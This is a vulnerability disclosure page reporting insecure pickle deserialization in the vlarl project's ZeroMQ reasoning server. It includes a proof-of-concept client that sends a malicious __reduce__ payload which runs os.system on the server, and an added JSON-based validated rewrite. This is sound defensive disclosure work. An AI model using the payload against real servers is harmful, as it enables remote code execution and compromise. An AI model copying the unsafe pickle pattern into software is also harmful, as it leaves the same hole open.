Submission #653279: vlarl latest Insecure Deserialization (leads to Remote Code Execution) - Information

Title: vlarl latest Insecure Deserialization (leads to Remote Code Execution)
Description:

# Security Report: Remote Code Execution Vulnerability in `experiments.robot.bridge.reasoning_server::run_reasoning_server`

### Summary

A critical Remote Code Execution (RCE) vulnerability exists in `experiments.robot.bridge.reasoning_server::run_reasoning_server`. The server accepts incoming messages and deserializes them using `pickle.loads`, which allows attackers to execute arbitrary code on the host system.

### Details

The vulnerable code is located at: [experiments.robot.bridge.reasoning_server::run_reasoning_server](https://github.com/GuanxingLu/vlarl/blob/main/experiments/robot/bridge/reasoning_server.py#L64-L86)

The server listens for incoming messages via ZeroMQ (`zmq`). Received data is deserialized using `pickle.loads(message)`:

```python
while True:
    message = socket.recv()
    inputs = pickle.loads(message)  # Unsafe deserialization
    result = model.raw_generate(*inputs)
    socket.send(pickle.dumps(result))
```

`pickle` is inherently unsafe for untrusted data. Attackers can craft malicious payloads that execute arbitrary code during deserialization.

### Proof of Concept (PoC)

1. Start the vulnerable server:

   ```shell
   PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py
   ```

2. Run the following client code to send a malicious payload:

   ```python
   import pickle, zmq

   class Payload(object):
       def __reduce__(self):
           import os
           return (os.system, ('echo "hacked"',))

   context = zmq.Context()
   socket = context.socket(zmq.REQ)
   socket.connect("tcp://127.0.0.1:5623")
   socket.send(pickle.dumps(Payload()))
   ```

3. The server will execute `os.system('echo "hacked"')`, demonstrating remote code execution.

### Impact

- Attackers can remotely execute arbitrary system commands, leading to full server compromise.
- This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure.

### Recommendation

- **Never use `pickle.loads` on data from untrusted sources.**
- Replace `pickle` with a safe serialization format such as JSON or MessagePack, and strictly validate all inputs.

### References

- [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns)
- [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
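The recommendation above (JSON instead of `pickle`, plus strict input validation) carried through as a worked example. This is added code, not vlarl's own: the request shape (a `prompts` list and a `params` object), the size limits, the allowed parameter names and the `model.raw_generate(prompts, **params)` call are all assumptions made for illustration, since the report only shows `model.raw_generate(*inputs)`. `serve_forever` takes a ZeroMQ REP socket as a parameter so the module itself needs no `zmq` import to run.

```python
import json

# Added example (not vlarl's code): JSON plus schema checks in place of pickle
# on the ZeroMQ request/reply path. The request shape and limits below are
# assumptions for illustration, not the project's real interface.

MAX_MESSAGE_BYTES = 64 * 1024      # reject oversized frames before parsing
MAX_PROMPTS = 8
MAX_PROMPT_CHARS = 4096
ALLOWED_PARAMS = {"max_new_tokens": int, "temperature": float}  # assumed knobs
ALLOWED_KEYS = {"prompts", "params"}


class InvalidRequest(ValueError):
    """Raised for any frame that does not match the expected schema."""


def decode_request(message: bytes) -> tuple[list[str], dict]:
    """Parse one request frame. json.loads only produces primitives, so no
    class constructor, __reduce__ hook or import can run while parsing."""
    if not isinstance(message, (bytes, bytearray)):
        raise InvalidRequest("frame must be bytes")
    if len(message) > MAX_MESSAGE_BYTES:
        raise InvalidRequest("frame too large")
    try:
        obj = json.loads(bytes(message).decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        # A pickle stream (protocol header 0x80 ...) fails here instead of executing
        raise InvalidRequest(f"not UTF-8 JSON: {exc}") from None
    if not isinstance(obj, dict):
        raise InvalidRequest("top-level value must be an object")
    unknown = set(obj) - ALLOWED_KEYS
    if unknown:
        raise InvalidRequest(f"unexpected keys: {sorted(unknown)}")
    prompts = obj.get("prompts")
    if not isinstance(prompts, list) or not 0 < len(prompts) <= MAX_PROMPTS:
        raise InvalidRequest("prompts must be a non-empty list")
    for prompt in prompts:
        if not isinstance(prompt, str) or not 0 < len(prompt) <= MAX_PROMPT_CHARS:
            raise InvalidRequest("each prompt must be a non-empty string")
    params = obj.get("params", {})
    if not isinstance(params, dict):
        raise InvalidRequest("params must be an object")
    for key, value in params.items():
        expected = ALLOWED_PARAMS.get(key)
        if expected is None:
            raise InvalidRequest(f"unknown parameter: {key}")
        # type() rather than isinstance(): bool is a subclass of int and must not pass
        ok = type(value) in (int, float) if expected is float else type(value) is expected
        if not ok:
            raise InvalidRequest(f"parameter {key} must be {expected.__name__}")
    return prompts, params


def encode_response(result) -> bytes:
    """json.dumps raises TypeError for non-JSON objects, so only plain data leaves the server."""
    return json.dumps(result, ensure_ascii=False).encode("utf-8")


def try_decode(message: bytes):
    """Convenience wrapper: (True, (prompts, params)) on success, (False, reason) otherwise."""
    try:
        return True, decode_request(message)
    except InvalidRequest as exc:
        return False, str(exc)


def serve_forever(socket, model):
    """Same loop shape as in the report, with the pickle calls replaced.
    `socket` is a zmq REP socket; `model.raw_generate(prompts, **params)` is
    the assumed call signature."""
    while True:
        message = socket.recv()
        try:
            prompts, params = decode_request(message)
            result = model.raw_generate(prompts, **params)
            socket.send(encode_response({"ok": True, "result": result}))
        except InvalidRequest as exc:
            # A REP socket must answer every request; reply with an error rather than crash
            socket.send(encode_response({"ok": False, "error": str(exc)}))
```

The client side sends `json.dumps({"prompts": [...]}).encode()` over the same REQ socket and reads the reply with `json.loads`. A frame produced by `pickle.dumps` is rejected at the UTF-8/JSON parsing step, before any object is constructed, and unknown keys, oversized prompts and mistyped parameters are refused so the validated tuple is the only thing that reaches `raw_generate`.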
Source: https://github.com/GuanxingLu/vlarl/issues/18
User: zznQ (UID 64000)
Submitted: 12/09/2025 07:58 AM (7 months ago)
Moderation: 25/09/2025 04:12 PM (13 days later)
Status: Approved
VulDB Entry: 325846 [GuanxingLu vlarl up to 31abc0baf53ef8f5db666a1c882e1ea64def2997 ZeroMQ reasoning_server.py run_reasoning_server message privilege escalation]
Points: 20
